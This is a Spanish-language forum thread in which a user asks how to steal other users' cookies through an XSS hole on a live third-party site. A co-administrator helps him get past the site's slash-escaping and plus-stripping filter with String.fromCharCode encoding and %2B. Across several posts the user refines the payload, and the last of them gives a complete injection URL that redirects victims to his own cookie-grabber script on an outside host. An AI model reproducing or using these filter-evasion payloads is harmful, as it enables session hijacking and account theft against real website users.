Tema destacado: Nueva página de elhacker.net en Google+ 
 Autor
|
Tema: XSS Evadir filtro (Leído 649 veces)
|
w1r3d
 Desconectado
Mensajes: 298
|
estaba tratando de acer un xss en una pagina donde cuando pongo <script>alert(document.cookie)</script> me regresa exitosamente mi cookie con la que me logeo a la pagina, me puse a leer uno de los tutoriales de como agarrar la cookie de otro usuario y encontre muy buena iformacion, de echo ya tengo una muy buena idea de como aserle con el siguiente script: <script>window.location=' http://www.tuserver.com/gcookie.php?c='+document.cookie;</script> mi unico problema es que cuando pongo eso no me envia la cookie a gcookie.php por que la pagina donde estoy asiendo el xss pone el codigo asi: <script>window.location=\' http://miserver.com/gcookie.php?c=\' document.cookie;</script> en pocas palabras cuando ingreso el script agrega una " \ " antes de cada " ' " alguien sabe como puedo poner el mismo script para que mande la cookie de la persona que le pike al link a mi cooki graber o algo similar? gracias |
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
Usa "String.fromCharCode", mira: http://www.google.com.mx/search?q=%22String.fromCharCode%22asi no usas texto tal cual, por lo que evitas que las magic te destruyan tu script. de hecho ayer lei un documento de la revista hackin9 donde sugieren que solo con addslashes, es seguro contra XSS, y eso es falsisimo.. es lamentable que crean esto, y siendo parte de una revista tan importante. Saludos!! |
|
|
|
|
En línea
|
|
|
|
w1r3d
Desconectado
Mensajes: 298
|
si entendi bien mi script deberia de kedar algo asi?
<script>window.location=+String.fromCharCode(39)http://death4fun.org/wp-content/themes/a-blog-of-my-own/gcookie.php?c=+String.fromCharCode(39)+document.cookie;</script>
pero lo que aora me di centa que paso fue lo siguiente.... al parecer elimina los simbolos de +
ese es el codigo fuente de la pagina despues de ingresar mi script
<script>window.location= String.fromCharCode(39)http://death4fun.org/wp-content/themes/a-blog-of-my-own/gcookie.php?c= String.fromCharCode(39) document.cookie;</script>
estoy asiendo algo mal o estoy en lo correcto y si omite el simbolo de +?
ay algo que pueda hacer?
|
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
no.. haber, no entendiste para que sirve String.fromCharCode Esta funcion transforma el valor en decimal de letras en un string. mira pon esto en la barra de direcciones: javascript:f=prompt('Escribe una palabra','');x="";for(i=0;i<f.length;i++){x+="\n"+f.charAt(i)+" = "+f.charCodeAt(i)}alert(x);
despues escribe alguna palabra.. da aceptar y te dara el valor decimal de las letras.. despues las pones asi: <script>window.location.href=String.fromCharCode(97,98,99,100)</script> cambiando 97,98,99,100 por los codigos correspondientes. tambien puedes obtener los valores de cada letra y caracter con una "ASCII Table" http://www.google.com/search?q=ASCII+TableSaludos!! |
|
|
|
|
En línea
|
|
|
|
w1r3d
Desconectado
Mensajes: 298
|
a disculpa mi ineptitud... ya logre que porlomenos me aceptara las ' lo que pasa aora eske no se que codigo es lo que tengo que cambiar a ASCII o si ay algun error en mi codigo... el esenario es este, cambie el lugar de mi cookie graber a un directorio mas facil. cuando pongo en la pagina <script>alert(document.cookie)</script> me da mi cookie de el foro poniendo <script>window.location=' http://death4fun.org/gcookie.php?c='+document.cookie;</script> deberiade mandarme la cookie de el foro a mi (el foro no esta en death4fun.org) aora con tu ayuda puse lo siguiente: <script>window.location.href=String.fromCharCode(39,104,116,116,112,58,47,47,100,101,97,116,104,52,102,117,110,46,111,114,103,47,103,99,111,111,107,105,101,46,112,104,112,63,99,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59)</script> que es : ' http://death4fun.org/gcookie.php?c='+document.cookie;pero lo que ase es mandarme a http://www.paginaconxss.com/'[url]http://death4fun.org/gcookie.php?c='+document.cookie;[/url] perdon pero no se que hacer :S para que me mande mi cookie a http://death4fun.org/gcookie.phpgracias... |
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
jeje, no te precoupes.
vas bien, solo que las comillas no se ponen, esta tecnica es precisamente para evitar el uso de comillas, es decir.. solo debe estar:
window.location=String.fromCharCode(1,2,3,4,5,6,7,8,09,etc..)+escape(document.cookie);
y en el codigo de la url, no incluyas las comillas.
Saludos!!
|
|
|
|
|
En línea
|
|
|
|
w1r3d
Desconectado
Mensajes: 298
|
creo que ya kedo, esto fue lo que ise siendo este el scrip original <script>window.location=' http://death4fun.org/gcookie.php?c='+document.cookie;</script> lo cambio por <script>window.location=String.fromCharCode(104,116,116,112,58,47,47,100,101,97,116,104,52,102,117,110,46,111,114,103,47,103,99,111,111,107,105,101,46,112,104,112,63,99,61)+escape(document.cookie);</script> donde 104,116,116,112,58,47,47,100,101,97,116,104,52,102,117,110,46,111,114,103,47,103,99,111,111,107,105,101,46,112,104,112,63,99,61 es : http://death4fun.org/gcookie.php?c=pero aun asi no funciono.... trate tambien con <script>window.location=String.fromCharCode(104,116,116,112,58,47,47,100,101,97,116,104,52,102,117,110,46,111,114,103,47,103,99,111,111,107,105,101,46,112,104,112,63,99,61)+document.cookie;</script> que es igual pero en bes de +escape(document.cookie); puse +document.cookie pero ninguno funciono, este es el codigo fuente: <script>window.location=String.fromCharCode(104,116,116,112,58,47,47,100,101,97,116,104,52,102,117,110,46,111,114,103,47,103,99,111,111,107,105,101,46,112,104,112,63,99,61) escape(document.cookie);</script> como te das cuenta omite el simbolo de "+" eso no tiene nada que ber? |
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
Bueno.. ya te dije por PM, pero les digo por aqui a los demas:
cambien el simbolo de + por %2B
Saludos!!
|
|
|
|
|
En línea
|
|
|
|
w1r3d
Desconectado
Mensajes: 298
|
si gracias, para los que no son tan dotados kedo exactamente asi: http://www.paginavuln.com/filevuln?pag=%3Cscript%3Ewindow.location=String.fromCharCode(104,116,116,112,58,47,47,100,101,97,116,104,52,102,117,110,46,111,114,103,47,103,99,111,111,107,105,101,46,112,104,112,63,99,61)%2Bescape(document.cookie);%3C/script%3E gracias |
|
|
|
|
En línea
|
|
|
|
ChElAnO
Desconectado
Mensajes: 129
|
interesante este tema,
y mas aun las ganas de ayudar de Sdc,
aunq no me ayudaste a mi directamente, igual aprendi asi que
gracias!!
salu2
|
|
|
|
|
En línea
|
|
|
|
|
 |
